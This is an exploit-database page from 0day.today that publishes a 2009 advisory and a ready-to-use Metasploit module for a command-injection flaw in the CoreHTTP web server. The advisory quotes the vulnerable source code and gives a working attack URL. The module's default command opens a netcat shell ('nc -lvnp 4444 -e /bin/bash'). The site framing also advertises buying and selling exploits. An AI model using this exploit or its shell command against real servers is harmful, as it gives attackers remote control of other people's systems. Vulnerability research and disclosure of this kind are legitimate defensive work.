0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
CoreHTTP Arbitrary Command Execution Vulnerability
================================================== CoreHTTP Arbitrary Command Execution Vulnerability ================================================== # Title: CoreHTTP Arbitrary Command Execution Vulnerability # CVE-ID: () # OSVDB-ID: () # Author: Aaron Conole # Published: 2009-12-23 # Verified: yes view source print? Package name: CoreHTTP server Version: 0.5.3.1 and below (as long as cgi support is enabled) Software URL: http://corehttp.sourceforge.net/ Exploit: http://aconole.brad-x.com/programs/corehttp_cgienabled.rb Issue: CoreHTTP server fails to properly sanitize input before calling popen() and allows an attacker using a standard web browser to execute arbitrary commands. NOTE: depending on the script and directory permissions, the attacker may not be able to view output. Further Discussion: During code review / debugging of CoreHTTP, a look at http.c source file revealed: /* escape the url for " and \ since we use it in popen */ for (i = 0; i < PATHSIZE; i++) { if (url[i] == '\0') break; else if (url[i] == '\\' || url[i] == '\"' || url[i] == '\'') { find = url + i; strcpy(temp, find); *find = '\\'; *(find+1) = '\0'; strcat(url, temp); i++; } } In the above, only " and \ are escaped, allowing one to specify |`& and any other special formatting. The URL then gets broken into 2 parts: - url (which in this case is a script) - args (which contains our 'evil' buffer) There is a caveat though: if (c == 0) { /* TODO our dirlist perl script takes the path of the dir as the arg. the way we do cgi right now is scipt.pl?arg turns into commandprompt> ./script.pl arg. obviously when urlencode is implemented correctly this must be changed. */ strcpy(args, url); strcpy(url, DIRLIST); break; } In this, we can see that DIRLIST overwrites the value of url and url overwrites the value of args - so for simple directory listing this vulnerability becomes a bit more difficult to exploit (depending on directory name, the system could still be vulnerable). Finally, here's the call to popen: } else if (cmd[0] != '\0') { /* if its dynamic content */ pipe(pipefd); /* make pipe then fork */ c = fork(); if (c > 0) { /* original, keep going */ close(pipefd[1]); /* no need to write */ sprocket->fd = pipefd[0]; SetNonBlock(sprocket->fd); } else if (c == 0) { /* child, popen */ close(pipefd[0]); /* no need to read */ pipetoprog = popen(cmd, "r"); /* fread should be non-blocking for this to exit fast when parent proc closes pipe */ while ((i = fread(temp, 1, BUFSIZE, pipetoprog)) != 0 && write(pipefd[1], temp, i) > 0); pclose(pipetoprog); close(pipefd[1]); exit(EXIT_SUCCESS); /* exit after done */ } else { /* failed */ RemoveSprock(sprocket, &FIRSTSPROCK); return NULL; } And there you have it. Simply download coreHTTP for yourself, build, enable CGI, touch foo.pl and then send it a request for /foo.pl%60command%26%60 which will set url to /foo.pl and args to `command&` and call popen. Voila! =========== ### ## MSF Exploit for CoreHTTP CGI Enabled Remote Arbitrary Command Execution ## CoreHTTP fails to properly sanitize user input before passing it to popen, ## allowing anyone with a web browser to run arbitrary commands. ## No CVE for this yet. ### require 'msf/core' class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'corehttp remote command execution', 'Description' => %q{ This module exploits a remote command execution vulnerability in corehttp versions 0.5.3.1 and earlier. It requires that you know the name of a cgi file on the server. NOTE: If you want to do something more than remote shell, you'll have to change CGICMD }, 'Author' => [ 'Aaron Conole' ], 'License' => MSF_LICENSE, 'Version' => '$Revision:$', 'References' => [ [ 'URL', 'http://aconole.brad-x.com/advisories/corehttp.txt' ], [ 'URL', 'http://corehttp.sourceforge.net' ], ], 'Priviledged' => false, 'Payload' => { 'Space' => 1024, }, 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [[ 'Automatic', { }]], 'DefaultTarget' => 0)) register_options( [ OptString.new('CGIURI', [true, "The URI of the CGI file to request", "/foo.pl"]), OptString.new('CGICMD', [true, "The command to execute on the remote machine (note: it doesn't support redirection)", "nc -lvnp 4444 -e /bin/bash&"]) ], self.class) end def exploit timeout = 0.01 print_status ("Building URI") uri = "" uri = uri.concat(datastore['CGIURI']) uri = uri.concat("?%60") uri.concat(datastore['CGICMD']) uri = uri.gsub(" ", "%20") uri.concat("%60") uri = uri.gsub("&", "%26") print_status("Trying URI #{uri}") response = send_request_raw({ 'uri' => uri}, timeout) handler end end # 0day.today [2024-12-24] #